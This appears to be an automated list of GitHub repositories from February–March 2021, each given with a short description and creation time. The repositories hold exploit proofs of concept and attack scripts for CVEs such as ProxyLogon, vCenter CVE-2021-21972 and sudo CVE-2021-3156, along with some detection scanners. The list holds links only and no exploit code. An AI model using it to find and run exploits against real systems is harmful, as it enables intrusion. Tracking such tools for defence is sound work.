**POC of CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-26865, ProxyLogon poc** : [Yt1g3r/CVE-2021-26855_SSRF](https://github.com/Yt1g3r/CVE-2021-26855_SSRF) create time: 2021-03-08T07:28:21Z

**CVE-­2021­-1732 Microsoft Windows 10 本地提权漏 研究及Poc/Exploit开发** : [k-k-k-k-k/CVE-2021-1732](https://github.com/k-k-k-k-k/CVE-2021-1732) create time: 2021-03-08T05:07:15Z

**Drupal RCE CVE Python Exploit** : [Kinesys/Kinesys-CVE-2019-6340](https://github.com/Kinesys/Kinesys-CVE-2019-6340) create time: 2021-03-07T18:44:49Z

**MS CVE 2020-0796 SMB** : [Kinesys/Kinesys-CVE-2020-0796](https://github.com/Kinesys/Kinesys-CVE-2020-0796) create time: 2021-03-07T17:24:42Z

**CVE-2021-21972 Unauthorized RCE in VMware vCenter metasploit exploit script** : [TaroballzChen/CVE-2021-21972](https://github.com/TaroballzChen/CVE-2021-21972) create time: 2021-03-07T16:30:36Z

**A working PoC to CVE-2018-16763** : [shoamshilo/Fuel-CMS-Remote-Code-Execution-1.4--RCE--](https://github.com/shoamshilo/Fuel-CMS-Remote-Code-Execution-1.4--RCE--) create time: 2021-03-07T14:57:13Z

**MS CVE 2019-0708 Python Exploit** : [Kinesys/Kinesys-CVE-2019-0708-Exploit](https://github.com/Kinesys/Kinesys-CVE-2019-0708-Exploit) create time: 2021-03-07T12:35:29Z

**Module pack for #ProxyLogon (part. of my contribute for Metasploit-Framework) [CVE-2021-26855 && CVE-2021-27065]** : [mekhalleh/exchange_proxylogon](https://github.com/mekhalleh/exchange_proxylogon) create time: 2021-03-07T12:12:16Z

**Gitlab v12.4.0-8.1 RCE** : [Liath/CVE-2020-10977](https://github.com/Liath/CVE-2020-10977) create time: 2021-03-07T07:26:38Z

**no description** : [xyddnljydd/cve-2020-1066](https://github.com/xyddnljydd/cve-2020-1066) create time: 2021-03-07T06:55:26Z

**no description** : [killtr0/POC-CVE-2018-6574](https://github.com/killtr0/POC-CVE-2018-6574) create time: 2021-03-07T02:45:41Z

**CVE-2021-26855 SSRF Exchange Server** : [Th3eCrow/CVE-2021-26855-SSRF-Exchange](https://github.com/Th3eCrow/CVE-2021-26855-SSRF-Exchange) create time: 2021-03-07T00:55:16Z

**PoC for CVE-2021-26855 -Just a checker-** : [0xAbdullah/CVE-2021-26855](https://github.com/0xAbdullah/CVE-2021-26855) create time: 2021-03-06T23:12:22Z

**no description** : [0xKn/CVE-2007-2447](https://github.com/0xKn/CVE-2007-2447) create time: 2021-03-06T20:39:21Z

**Poc for CVE-2020-12255** : [vishwaraj101/CVE-2020-12255](https://github.com/vishwaraj101/CVE-2020-12255) create time: 2021-03-06T20:28:43Z

**This script helps to identify CVE-2021-26855 ssrf Poc** : [pussycat0x/CVE-2021-26855-SSRF](https://github.com/pussycat0x/CVE-2021-26855-SSRF) create time: 2021-03-06T19:03:00Z

**Microsoft Exchange Server SSRF漏洞(CVE-2021-26855)** : [conjojo/Microsoft_Exchange_Server_SSRF_CVE-2021-26855](https://github.com/conjojo/Microsoft_Exchange_Server_SSRF_CVE-2021-26855) create time: 2021-03-06T09:15:55Z

**Quick One Line Powershell scripts to detect for webshells, possible zips, and logs.** : [adamrpostjr/cve-2021-27065](https://github.com/adamrpostjr/cve-2021-27065) create time: 2021-03-06T04:47:35Z

**struts2-rest-showcase 2.5.10** : [z3bd/CVE-2017-9805](https://github.com/z3bd/CVE-2017-9805) create time: 2021-03-05T21:57:11Z

**Detect webshells dropped on Microsoft Exchange servers exploited through "proxylogon" group of vulnerabilites (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065)** : [cert-lv/exchange_webshell_detection](https://github.com/cert-lv/exchange_webshell_detection) create time: 2021-03-05T08:22:07Z

**带回显版本的漏洞利用脚本** : [skytina/CVE-2021-21978](https://github.com/skytina/CVE-2021-21978) create time: 2021-03-05T08:15:27Z

**CVE-2021-21978 EXP** : [me1ons/CVE-2021-21978](https://github.com/me1ons/CVE-2021-21978) create time: 2021-03-05T04:33:19Z

**CVE-2021-21978 exp** : [GreyOrder/CVE-2021-21978](https://github.com/GreyOrder/CVE-2021-21978) create time: 2021-03-05T03:58:33Z

**CVE-2021-1732 Exploit** : [KaLendsi/CVE-2021-1732-Exploit](https://github.com/KaLendsi/CVE-2021-1732-Exploit) create time: 2021-03-05T02:11:10Z

**Script used to identify compromise via CVEs 2021-26855, 26857, 26858, and 27065** : [WiredPulse/Invoke-HAFNIUMCheck.ps1](https://github.com/WiredPulse/Invoke-HAFNIUMCheck.ps1) create time: 2021-03-04T23:30:22Z

**poc based on: https://github.com/emcalv/tivoli-poc** : [bcdannyboy/cve-2017-1635-PoC](https://github.com/bcdannyboy/cve-2017-1635-PoC) create time: 2021-03-04T19:52:48Z

**SD-91948: CVE-2020-35682: Authentication Bypass Vulnerability during SAML login in ServiceDesk Plus.** : [its-arun/CVE-2020-35682](https://github.com/its-arun/CVE-2020-35682) create time: 2021-03-04T12:43:01Z

**no description** : [cherrera0001/CVE-2021-21315v2](https://github.com/cherrera0001/CVE-2021-21315v2) create time: 2021-03-04T11:47:18Z

**CVE-2021-21972 related vulnerability code** : [ByZain/CVE-2021-21972](https://github.com/ByZain/CVE-2021-21972) create time: 2021-03-04T07:14:10Z

**Exploit code for CVE-2021-21042** : [NattiSamson/CVE-2021-21042](https://github.com/NattiSamson/CVE-2021-21042) create time: 2021-03-04T07:01:08Z

**no description** : [lorsanta/exploit-CVE-2020-28926](https://github.com/lorsanta/exploit-CVE-2020-28926) create time: 2021-03-03T21:06:56Z

**A PowerShell script to identify indicators of exploitation of CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-26865** : [soteria-security/HAFNIUM-IOC](https://github.com/soteria-security/HAFNIUM-IOC) create time: 2021-03-03T17:36:18Z

**IoC determination for exploitation of CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.** : [sgnls/exchange-0days-202103](https://github.com/sgnls/exchange-0days-202103) create time: 2021-03-03T14:50:16Z

**no description** : [d3sh1n/cve-2021-21972](https://github.com/d3sh1n/cve-2021-21972) create time: 2021-03-03T03:01:46Z

**com_media allowed paths that are not intended for image uploads to RCE** : [HoangKien1020/CVE-2021-23132](https://github.com/HoangKien1020/CVE-2021-23132) create time: 2021-03-03T02:13:57Z

**BEAST (CVE-2001-3389) Checker** : [becrevex/Gaston](https://github.com/becrevex/Gaston) create time: 2021-03-03T02:10:01Z

**IOCs found exploiting CVE-2021-26855 thanks to info from Volexity and MS and Huntresslabs.** : [stressboi/hafnium-exchange-splunk-csvs](https://github.com/stressboi/hafnium-exchange-splunk-csvs) create time: 2021-03-03T00:11:09Z

**CVE-2020-12351** : [naren-jayram/Linux-Heap-Based-Type-Confusion-in-L2CAP](https://github.com/naren-jayram/Linux-Heap-Based-Type-Confusion-in-L2CAP) create time: 2021-03-01T20:44:50Z

**CVE 2021-21315 PoC** : [ForbiddenProgrammer/CVE-2021-21315-PoC](https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC) create time: 2021-03-01T18:52:41Z

**no description** : [synacktiv/CVE-2021-27246_Pwn2Own2020](https://github.com/synacktiv/CVE-2021-27246_Pwn2Own2020) create time: 2021-03-01T16:45:42Z

**漏洞利用,Vmware vCenter 6.5-7.0 RCE(CVE-2021-21972),上传冰蝎3,getshell** : [gsheller/vcenter_rce](https://github.com/gsheller/vcenter_rce) create time: 2021-03-01T14:14:01Z

**no description** : [AndyFeiLi/-CVE-2019-7214](https://github.com/AndyFeiLi/-CVE-2019-7214) create time: 2021-03-01T14:09:02Z

**no description** : [DXY0411/CVE-2020-9484](https://github.com/DXY0411/CVE-2020-9484) create time: 2021-03-01T11:16:04Z

**Modified the test PoC from Secura, CVE-2020-1472, to change the machine password to null** : [hell-moon/ZeroLogon-Exploit](https://github.com/hell-moon/ZeroLogon-Exploit) create time: 2021-03-01T04:21:47Z

**vue-storefront-api** : [0ndras3k/CVE-2020-11883](https://github.com/0ndras3k/CVE-2020-11883) create time: 2021-02-28T23:26:22Z

**The sample CVE-ID 2017-2020 in VRM paper** : [vidaAhmadi/sample-CVE](https://github.com/vidaAhmadi/sample-CVE) create time: 2021-02-28T20:53:14Z

**no description** : [Udyz/CVE-2021-26119](https://github.com/Udyz/CVE-2021-26119) create time: 2021-02-28T14:05:23Z

**CVE-2015-3224** : [xda3m00n/CVE-2015-3224-](https://github.com/xda3m00n/CVE-2015-3224-) create time: 2021-02-27T19:47:14Z

**VMware vCenter CVE-2021-21972 Tools** : [robwillisinfo/VMware_vCenter_CVE-2021-21972](https://github.com/robwillisinfo/VMware_vCenter_CVE-2021-21972) create time: 2021-02-27T10:27:04Z

**no description** : [JMousqueton/Detect-CVE-2021-21972](https://github.com/JMousqueton/Detect-CVE-2021-21972) create time: 2021-02-27T09:53:57Z

**no description** : [DougCarroll/CVE_2021_21972](https://github.com/DougCarroll/CVE_2021_21972) create time: 2021-02-27T00:55:13Z

**Nmap script to check vulnerability CVE-2021-21972** : [GuayoyoCyber/CVE-2021-21972](https://github.com/GuayoyoCyber/CVE-2021-21972) create time: 2021-02-26T21:30:50Z

**no description** : [ZeusBox/CVE-2021-21017](https://github.com/ZeusBox/CVE-2021-21017) create time: 2021-02-26T14:18:13Z

**Chaining CVE-2021-25281 and CVE-2021-25282 to exploit a SaltStack** : [Immersive-Labs-Sec/CVE-2021-25281](https://github.com/Immersive-Labs-Sec/CVE-2021-25281) create time: 2021-02-26T12:08:25Z

**SonLogger Vulns (CVE-2021-27963, CVE-2021-27964)** : [erberkan/SonLogger-vulns](https://github.com/erberkan/SonLogger-vulns) create time: 2021-02-26T11:44:04Z

**Nibbleblog 4.0.3 - Arbitrary File Upload (CVE-2015-6967)** : [dix0nym/CVE-2015-6967](https://github.com/dix0nym/CVE-2015-6967) create time: 2021-02-25T21:57:24Z

**CVE-2021-21972** : [renini/CVE-2021-21972](https://github.com/renini/CVE-2021-21972) create time: 2021-02-25T13:04:37Z

**CVE-2020-14882** : [milo2012/CVE-2020-14882](https://github.com/milo2012/CVE-2020-14882) create time: 2021-02-25T12:57:08Z

**A vulnerability scanner that detects CVE-2020-14883 vulnerabilities.** : [Osyanina/westone-CVE-2020-14883-scanner](https://github.com/Osyanina/westone-CVE-2020-14883-scanner) create time: 2021-02-25T11:21:56Z

**A vulnerability scanner that detects CVE-2020-17519 vulnerabilities.** : [Osyanina/westone-CVE-2020-17519-scanner](https://github.com/Osyanina/westone-CVE-2020-17519-scanner) create time: 2021-02-25T11:06:05Z

**VMware vCenter Server远程代码执行漏洞 (CVE-2021-21972)批量检测脚本** : [B1anda0/CVE-2021-21972](https://github.com/B1anda0/CVE-2021-21972) create time: 2021-02-25T10:16:20Z

**no description** : [L-pin/CVE-2021-21972](https://github.com/L-pin/CVE-2021-21972) create time: 2021-02-25T09:28:17Z

**VMware vCenter 未授权RCE(CVE-2021-21972)** : [conjojo/VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972](https://github.com/conjojo/VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972) create time: 2021-02-25T07:17:21Z

**CVE-2021-21972 vCenter-6.5-7.0 RCE POC** : [Udyz/CVE-2021-21972](https://github.com/Udyz/CVE-2021-21972) create time: 2021-02-25T05:25:46Z

**CVE-2021-21972** : [milo2012/CVE-2021-21972](https://github.com/milo2012/CVE-2021-21972) create time: 2021-02-25T05:16:38Z

**no description** : [alt3kx/CVE-2021-21972](https://github.com/alt3kx/CVE-2021-21972) create time: 2021-02-25T05:10:06Z

**A vulnerability scanner that detects CVE-2021-21972 vulnerabilities.** : [Osyanina/westone-CVE-2021-21972-scanner](https://github.com/Osyanina/westone-CVE-2021-21972-scanner) create time: 2021-02-25T03:19:25Z

**Proof of Concept Exploit for vCenter CVE-2021-21972** : [horizon3ai/CVE-2021-21972](https://github.com/horizon3ai/CVE-2021-21972) create time: 2021-02-24T16:31:34Z

**no description** : [lsw29475/CVE-2020-17057](https://github.com/lsw29475/CVE-2020-17057) create time: 2021-02-24T13:19:44Z

**no description** : [yaunsky/CVE-2021-21972](https://github.com/yaunsky/CVE-2021-21972) create time: 2021-02-24T13:19:41Z

**no description** : [lsw29475/CVE-2019-17026](https://github.com/lsw29475/CVE-2019-17026) create time: 2021-02-24T13:18:54Z

**no description** : [lsw29475/CVE-2020-0022](https://github.com/lsw29475/CVE-2020-0022) create time: 2021-02-24T13:17:41Z

**LMA ISIDA Retriever 5.2 allows SQL Injection** : [Security-AVS/-CVE-2021-26904](https://github.com/Security-AVS/-CVE-2021-26904) create time: 2021-02-24T12:42:52Z

**ISIDA RETRIEVER v5.2" Reflected XSS** : [Security-AVS/CVE-2021-26903](https://github.com/Security-AVS/CVE-2021-26903) create time: 2021-02-24T12:36:01Z

**CVE-2021-21972 Exploit** : [NS-Sp4ce/CVE-2021-21972](https://github.com/NS-Sp4ce/CVE-2021-21972) create time: 2021-02-24T11:14:58Z

**CVE-2021-3327** : [IthacaLabs/CVE-2021-3327](https://github.com/IthacaLabs/CVE-2021-3327) create time: 2021-02-24T10:57:22Z

**no description** : [QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC](https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC) create time: 2021-02-24T09:56:21Z

**This repo contains a proof-of-concept for 📱🚀👑⚡, a deserialization vuln for local escalation of privilege to system_server in Android 10. This proof-of-concept only activates a privileged intent.** : [0x742/CVE-2020-0082-ExternalVibration](https://github.com/0x742/CVE-2020-0082-ExternalVibration) create time: 2021-02-23T14:00:55Z

**no description** : [oneoy/CVE-2021-3156](https://github.com/oneoy/CVE-2021-3156) create time: 2021-02-23T03:14:36Z

**2020l4web-app-mockup-DanCvejn created by GitHub Classroom** : [pslib-cz/2020l4web-app-mockup-DanCvejn](https://github.com/pslib-cz/2020l4web-app-mockup-DanCvejn) create time: 2021-02-22T13:51:58Z

**Python implementation of 'Username' map script' RCE Exploit for Samba 3.0.20 < 3.0.25rc3 (CVE-2007-2447).** : [Ziemni/CVE-2007-2447-in-Python](https://github.com/Ziemni/CVE-2007-2447-in-Python) create time: 2021-02-22T13:43:48Z

**no description** : [Nicoslo/Windows-Exploitation-Web-Server-Tomcat-8.5.39-CVE-2019-0232](https://github.com/Nicoslo/Windows-Exploitation-Web-Server-Tomcat-8.5.39-CVE-2019-0232) create time: 2021-02-21T16:56:25Z

**CVE-2021-3129-Laravel Debug mode 远程代码执行漏洞** : [simonlee-hello/CVE-2021-3129](https://github.com/simonlee-hello/CVE-2021-3129) create time: 2021-02-21T06:27:18Z

**no description** : [Nicoslo/Windows-exploitation-Apache-Tomcat-8.5.19-CVE-2019-0232-](https://github.com/Nicoslo/Windows-exploitation-Apache-Tomcat-8.5.19-CVE-2019-0232-) create time: 2021-02-20T18:38:48Z

**no description** : [Nicoslo/Windows-exploitation-Rejetto-HTTP-File-Server-HFS-2.3.x-CVE-2014-6287](https://github.com/Nicoslo/Windows-exploitation-Rejetto-HTTP-File-Server-HFS-2.3.x-CVE-2014-6287) create time: 2021-02-20T18:28:16Z

**2021 CVE/other Vulnerabilities** : [DesM00nd/2021](https://github.com/DesM00nd/2021) create time: 2021-02-20T10:02:02Z

**Spring Cloud Config 目录穿越漏洞(CVE-2020-5410) 复现** : [thelostworldFree/SpringCloud-Config-CVE-2020-5410](https://github.com/thelostworldFree/SpringCloud-Config-CVE-2020-5410) create time: 2021-02-20T08:05:51Z

**no description** : [roninAPT/CVE-2018-0802](https://github.com/roninAPT/CVE-2018-0802) create time: 2021-02-20T02:34:16Z

**CVE-2021-21110 : Tiki Wiki CMS GroupWare Serverside Template Injection Remote Code Execution Exploit** : [Gh0st0ne/CVE-2021-21110](https://github.com/Gh0st0ne/CVE-2021-21110) create time: 2021-02-20T02:19:40Z

**CSRF Code snippet vulnerability CVE-2020-8417** : [Vulnmachines/WordPress_CVE-2020-8417](https://github.com/Vulnmachines/WordPress_CVE-2020-8417) create time: 2021-02-19T20:37:23Z

**Full exploit code for CVE-2019-25024 an unauthenticated command injection flaw in OpenRepeater.** : [codexlynx/CVE-2019-25024](https://github.com/codexlynx/CVE-2019-25024) create time: 2021-02-19T15:05:37Z

**no description** : [SQSamir/CVE-2021-27328](https://github.com/SQSamir/CVE-2021-27328) create time: 2021-02-19T07:15:48Z

**no description** : [Eternit7/CVE-2019-1458](https://github.com/Eternit7/CVE-2019-1458) create time: 2021-02-19T02:44:27Z

**HostHeaderInjection-Askey** : [bokanrb/CVE-2021-27404](https://github.com/bokanrb/CVE-2021-27404) create time: 2021-02-18T17:16:39Z

**XSS-Askey** : [bokanrb/CVE-2021-27403](https://github.com/bokanrb/CVE-2021-27403) create time: 2021-02-18T16:14:48Z

**no description** : [Nicoslo/Windows-exploitation-BadBlue-2.7-CVE-2007-6377](https://github.com/Nicoslo/Windows-exploitation-BadBlue-2.7-CVE-2007-6377) create time: 2021-02-18T10:33:44Z

**Laravel <= v8.4.2 debug mode: Remote code execution (CVE-2021-3129)** : [zhzyker/CVE-2021-3129](https://github.com/zhzyker/CVE-2021-3129) create time: 2021-02-18T05:42:13Z

**PoC for CVE-2015-1769** : [int0/CVE-2015-1769](https://github.com/int0/CVE-2015-1769) create time: 2021-02-17T03:25:53Z

**no description** : [klinix5/CVE-2021-1727](https://github.com/klinix5/CVE-2021-1727) create time: 2021-02-16T16:55:46Z

**no description** : [forse01/CVE-2019-5413-NetBeans-NoJson](https://github.com/forse01/CVE-2019-5413-NetBeans-NoJson) create time: 2021-02-16T07:25:57Z

**Investigating the bug behind CVE-2021-26708** : [jordan9001/vsock_poc](https://github.com/jordan9001/vsock_poc) create time: 2021-02-15T20:27:06Z

**Exploit script for CVE-2021-27211** : [b4shfire/stegcrack](https://github.com/b4shfire/stegcrack) create time: 2021-02-15T17:54:49Z

**no description** : [sourceincite/CVE-2021-24085](https://github.com/sourceincite/CVE-2021-24085) create time: 2021-02-15T14:41:25Z

**no description** : [DXY0411/CVE-2020-8637](https://github.com/DXY0411/CVE-2020-8637) create time: 2021-02-15T06:38:35Z

**CVE-2020-14210** : [monitorapp-aicc/report](https://github.com/monitorapp-aicc/report) create time: 2021-02-15T05:08:22Z

**no description** : [Yealid/CVE-2018-6574](https://github.com/Yealid/CVE-2018-6574) create time: 2021-02-14T14:59:24Z

**RCE in NPM VSCode Extention** : [jackadamson/CVE-2021-26700](https://github.com/jackadamson/CVE-2021-26700) create time: 2021-02-14T14:01:04Z

**OpenSSL Heartbleed Bug CVE-2014-0160 Toolkit. Built with ❤ by Christopher Ngo.** : [ingochris/heartpatch.us](https://github.com/ingochris/heartpatch.us) create time: 2021-02-14T10:48:56Z

**no description** : [FunPhishing/Laravel-8.4.2-rce-CVE-2021-3129](https://github.com/FunPhishing/Laravel-8.4.2-rce-CVE-2021-3129) create time: 2021-02-14T09:24:07Z

**no description** : [danielklim/cve-2020-8165-demo](https://github.com/danielklim/cve-2020-8165-demo) create time: 2021-02-14T06:57:30Z

**PoC DoS CVE-2020-36109** : [tin-z/CVE-2020-36109-POC](https://github.com/tin-z/CVE-2020-36109-POC) create time: 2021-02-13T16:03:36Z

**no description** : [Vulnmachines/Apache-Druid-CVE-2021-25646](https://github.com/Vulnmachines/Apache-Druid-CVE-2021-25646) create time: 2021-02-13T11:48:35Z

**OpenSMTPD 6.4.0 - 6.6.1 Remote Code Execution PoC exploit** : [QTranspose/CVE-2020-7247-exploit](https://github.com/QTranspose/CVE-2020-7247-exploit) create time: 2021-02-13T06:57:47Z

**Magento versions 2.4.1 (and earlier), 2.4.0-p1 (and earlier) and 2.3.6 (and earlier) are vulnerable to a file upload restriction bypass. Successful exploitation could lead to arbitrary code execution by an authenticated attacker.** : [HoangKien1020/CVE-2021-21014](https://github.com/HoangKien1020/CVE-2021-21014) create time: 2021-02-13T06:16:39Z

**no description** : [sourceincite/CVE-2021-26121](https://github.com/sourceincite/CVE-2021-26121) create time: 2021-02-12T18:53:37Z

**no description** : [jet-pentest/CVE-2021-27188](https://github.com/jet-pentest/CVE-2021-27188) create time: 2021-02-12T07:32:51Z

**How to solve Sudo Heap-Based Buffer Overflow Vulnerability — CVE-2021-3156?** : [r3k4t/how-to-solve-sudo-heap-based-bufferoverflow-vulnerability](https://github.com/r3k4t/how-to-solve-sudo-heap-based-bufferoverflow-vulnerability) create time: 2021-02-12T02:44:30Z

**Flag the cve-2020-35498 attack** : [freddierice/cve-2020-35498-flag](https://github.com/freddierice/cve-2020-35498-flag) create time: 2021-02-12T02:08:01Z

**no description** : [jet-pentest/CVE-2021-27187](https://github.com/jet-pentest/CVE-2021-27187) create time: 2021-02-11T15:03:48Z

**Exploit CVE-2020-29134 - TOTVS Fluig Platform - Path Traversal** : [lucxssouza/CVE-2020-29134](https://github.com/lucxssouza/CVE-2020-29134) create time: 2021-02-11T13:44:40Z

**no description** : [FunPhishing/CVE-2021-24096](https://github.com/FunPhishing/CVE-2021-24096) create time: 2021-02-11T12:32:34Z

**no description** : [anmolksachan/CVE-2021-27190-PEEL-Shopping-cart-9.3.0-Stored-XSS](https://github.com/anmolksachan/CVE-2021-27190-PEEL-Shopping-cart-9.3.0-Stored-XSS) create time: 2021-02-11T07:10:58Z

**Test for CVE-2000-0649, and return an IP address if vulnerable** : [rafaelh/CVE-2000-0649](https://github.com/rafaelh/CVE-2000-0649) create time: 2021-02-11T04:29:50Z

**no description** : [azizalshammari/CVE-2020-36079.](https://github.com/azizalshammari/CVE-2020-36079.) create time: 2021-02-10T17:21:10Z

**POC for CVE-2020-9484** : [VICXOR/CVE-2020-9484](https://github.com/VICXOR/CVE-2020-9484) create time: 2021-02-10T16:27:07Z

**no description** : [synacktiv/CVE-2021-1782](https://github.com/synacktiv/CVE-2021-1782) create time: 2021-02-10T14:38:05Z

**CVE-2021-3165: SmartAgent 3.1.0 - Privilege Escalation** : [orionhridoy/CVE-2021-3165](https://github.com/orionhridoy/CVE-2021-3165) create time: 2021-02-10T08:51:00Z

**no description** : [TechnoHT/CVE-2020-0041](https://github.com/TechnoHT/CVE-2020-0041) create time: 2021-02-10T05:42:26Z

**no description** : [alebedev87/gatekeeper-cve-2020-8554](https://github.com/alebedev87/gatekeeper-cve-2020-8554) create time: 2021-02-09T21:29:44Z

**CVE-2021-3156非交互式执行命令** : [Rvn0xsy/CVE-2021-3156-plus](https://github.com/Rvn0xsy/CVE-2021-3156-plus) create time: 2021-02-09T19:25:18Z

**sudo heap overflow to LPE, in Go** : [jm33-m0/CVE-2021-3156](https://github.com/jm33-m0/CVE-2021-3156) create time: 2021-02-09T07:55:47Z

**보안취약점 확인** : [gmldbd94/cve-2021-3156](https://github.com/gmldbd94/cve-2021-3156) create time: 2021-02-09T07:06:49Z

**Exploit for Sudo heap overflow (CVE-2021-3156) on Debain 10** : [0xdevil/CVE-2021-3156](https://github.com/0xdevil/CVE-2021-3156) create time: 2021-02-08T18:21:58Z

**Fixed version of the Python script to exploit CVE-2018-19571 and CVE-2018-19585 (GitLab 11.4.7 - Authenticated Remote Code Execution) that is available at https://www.exploit-db.com/exploits/49263 (Python 3.9).** : [xenophil90/edb-49263-fixed](https://github.com/xenophil90/edb-49263-fixed) create time: 2021-02-08T07:38:09Z

**no description** : [roughb8722/CVE-2021-3122-Details](https://github.com/roughb8722/CVE-2021-3122-Details) create time: 2021-02-07T16:05:49Z

**CVE-2020-7384** : [nikhil1232/CVE-2020-7384](https://github.com/nikhil1232/CVE-2020-7384) create time: 2021-02-07T16:00:41Z

**no description** : [fullbbadda1208/CVE-2021-3229](https://github.com/fullbbadda1208/CVE-2021-3229) create time: 2021-02-07T14:12:27Z

**Apple Safari Remote Code Execution** : [FunPhishing/Apple-Safari-Remote-Code-Execution-CVE-2020-27930](https://github.com/FunPhishing/Apple-Safari-Remote-Code-Execution-CVE-2020-27930) create time: 2021-02-07T11:28:21Z

**no description** : [Grayhaxor/CVE-2021-21148](https://github.com/Grayhaxor/CVE-2021-21148) create time: 2021-02-07T09:59:47Z

**no description** : [1N53C/CVE-2021-3156-PoC](https://github.com/1N53C/CVE-2021-3156-PoC) create time: 2021-02-06T21:16:11Z

**no description** : [46o60/CVE-2019-3396_Confluence](https://github.com/46o60/CVE-2019-3396_Confluence) create time: 2021-02-05T16:31:30Z

**Custom version of sudo 1.8.3p1 with CVE-2021-3156 patches applied** : [perlun/sudo-1.8.3p1-patched](https://github.com/perlun/sudo-1.8.3p1-patched) create time: 2021-02-05T09:13:17Z

**no description** : [y3rb1t4/CVE-2021-3157](https://github.com/y3rb1t4/CVE-2021-3157) create time: 2021-02-05T09:07:20Z

**Poc for CVE-2020-14181** : [bk-rao/CVE-2020-14181](https://github.com/bk-rao/CVE-2020-14181) create time: 2021-02-05T07:48:19Z

**no description** : [DXY0411/CVE-2019-16113](https://github.com/DXY0411/CVE-2019-16113) create time: 2021-02-05T06:51:51Z

**Temproot for Pixel 2 and Pixel 2 XL via CVE-2019-2215** : [Byte-Master-101/CVE-2019-2215](https://github.com/Byte-Master-101/CVE-2019-2215) create time: 2021-02-05T06:23:28Z

**no description** : [forse01/CVE-2020-17527-Tomcat](https://github.com/forse01/CVE-2020-17527-Tomcat) create time: 2021-02-05T00:18:45Z

**no description** : [Vulnerability-Playground/CVE-2019-1068](https://github.com/Vulnerability-Playground/CVE-2019-1068) create time: 2021-02-04T21:40:56Z

**simple bash script of CVE-2020-3452 Cisco ASA / Firepower Read-Only Path Traversal Vulnerability checker** : [faisalfs10x/Cisco-CVE-2020-3452-shodan-scanner](https://github.com/faisalfs10x/Cisco-CVE-2020-3452-shodan-scanner) create time: 2021-02-04T16:50:27Z

**simple bash script of F5 BIG-IP TMUI Vulnerability CVE-2020-5902 checker** : [faisalfs10x/F5-BIG-IP-CVE-2020-5902-shodan-scanner](https://github.com/faisalfs10x/F5-BIG-IP-CVE-2020-5902-shodan-scanner) create time: 2021-02-04T16:36:21Z

**CVE-2020-3992 & CVE-2019-5544** : [dgh05t/VMware_ESXI_OpenSLP_PoCs](https://github.com/dgh05t/VMware_ESXI_OpenSLP_PoCs) create time: 2021-02-04T15:15:22Z

**CSharp CVE-2021-25646-GUI** : [AirEvan/CVE-2021-25646-GUI](https://github.com/AirEvan/CVE-2021-25646-GUI) create time: 2021-02-04T12:51:01Z

**CVE-2021-1994、CVE-2021-2047、CVE-2021-2064、CVE-2021-2108、CVE-2021-2075、CVE-2019-17195、CVE-2020-14756、CVE-2021-2109** : [somatrasss/weblogic2021](https://github.com/somatrasss/weblogic2021) create time: 2021-02-04T07:03:56Z

**no description** : [forse01/CVE-2020-11990-Cordova](https://github.com/forse01/CVE-2020-11990-Cordova) create time: 2021-02-04T06:22:06Z

**no description** : [forse01/CVE-2019-17638-Jetty](https://github.com/forse01/CVE-2019-17638-Jetty) create time: 2021-02-04T05:07:42Z

**no description** : [forse01/CVE-2020-25213-Wordpress](https://github.com/forse01/CVE-2020-25213-Wordpress) create time: 2021-02-04T04:52:06Z

**Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution for Python3** : [tyranteye666/tomcat-cve-2017-12617](https://github.com/tyranteye666/tomcat-cve-2017-12617) create time: 2021-02-04T04:28:21Z

**no description** : [forse01/CVE-2019-5413-NetBeans](https://github.com/forse01/CVE-2019-5413-NetBeans) create time: 2021-02-04T00:02:59Z

**no description** : [forse01/CVE-2018-1000542-NetBeans](https://github.com/forse01/CVE-2018-1000542-NetBeans) create time: 2021-02-04T00:01:33Z

**Root shell PoC for CVE-2021-3156** : [CptGibbon/CVE-2021-3156](https://github.com/CptGibbon/CVE-2021-3156) create time: 2021-02-03T19:57:56Z

**no description** : [leterts/CVE-2021-3156-sudo-raising](https://github.com/leterts/CVE-2021-3156-sudo-raising) create time: 2021-02-03T11:27:52Z

**CVE-2021-3156 Vagrant Lab** : [dinhbaouit/CVE-2021-3156](https://github.com/dinhbaouit/CVE-2021-3156) create time: 2021-02-03T09:48:46Z

**no description** : [cdeletre/Serpentiel-CVE-2021-3156](https://github.com/cdeletre/Serpentiel-CVE-2021-3156) create time: 2021-02-03T09:04:14Z

**CVE -2012-0152** : [anmolksachan/MS12-020](https://github.com/anmolksachan/MS12-020) create time: 2021-02-03T08:59:31Z

**CTF for HDE 64 students at See Security College. Exploit a JWT (web part) & CVE-2021-3156 (LPE part).** : [TheSerialiZator/CTF-2021](https://github.com/TheSerialiZator/CTF-2021) create time: 2021-02-03T08:36:01Z

**shiro-cve-2020-17523 漏洞的两种绕过姿势分析(带漏洞环境)** : [jweny/shiro-cve-2020-17523](https://github.com/jweny/shiro-cve-2020-17523) create time: 2021-02-03T08:14:03Z

**no description** : [lp008/CVE-2021-25646](https://github.com/lp008/CVE-2021-25646) create time: 2021-02-03T06:45:54Z

**CVE-2020-3452 - Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) traversal** : [fuzzlove/Cisco-ASA-FTD-Web-Services-Traversal](https://github.com/fuzzlove/Cisco-ASA-FTD-Web-Services-Traversal) create time: 2021-02-03T05:45:53Z

**Apache Druid 远程代码执行;检测脚本** : [yaunsky/cve-2021-25646](https://github.com/yaunsky/cve-2021-25646) create time: 2021-02-03T03:59:52Z

**no description** : [jet-pentest/CVE-2021-3395](https://github.com/jet-pentest/CVE-2021-3395) create time: 2021-02-02T18:31:35Z

**This is a repo for the PoC's I found from diffrernt github repoisitory of the recent sudo CVE 2021-3156 (Baron Samedit)** : [AbdullahRizwan101/Baron-Samedit](https://github.com/AbdullahRizwan101/Baron-Samedit) create time: 2021-02-02T12:55:30Z

